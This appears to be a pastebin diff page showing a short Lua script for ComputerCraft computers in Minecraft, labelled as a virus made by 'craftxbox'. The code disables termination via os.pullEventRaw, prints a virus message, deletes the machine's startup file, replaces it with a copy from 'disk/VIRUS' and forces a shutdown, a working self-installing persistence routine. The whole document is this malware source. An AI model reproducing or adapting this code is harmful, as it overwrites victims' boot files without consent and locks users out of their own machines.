View difference between Paste ID: 70eiKF2Y and rm3giP6p
SHOW: | | - or go back to the newest paste.
1
--Made by craftxbox
2
--Version 0.3
3
os.pullEvent = os.pullEventRaw
4
term.clear()
5
print("This computer has a virus.Shutting down")
6
sleep(5)
7
if fs.exists ("startup") == true then
8
fs.delete("startup")
9
fs.copy("disk/VIRUS","startup")
10
os.shutdown()
11
else
12
fs.copy("disk/VIRUS","startup")
13
sleep(2)
14
os.shutdown()
15
end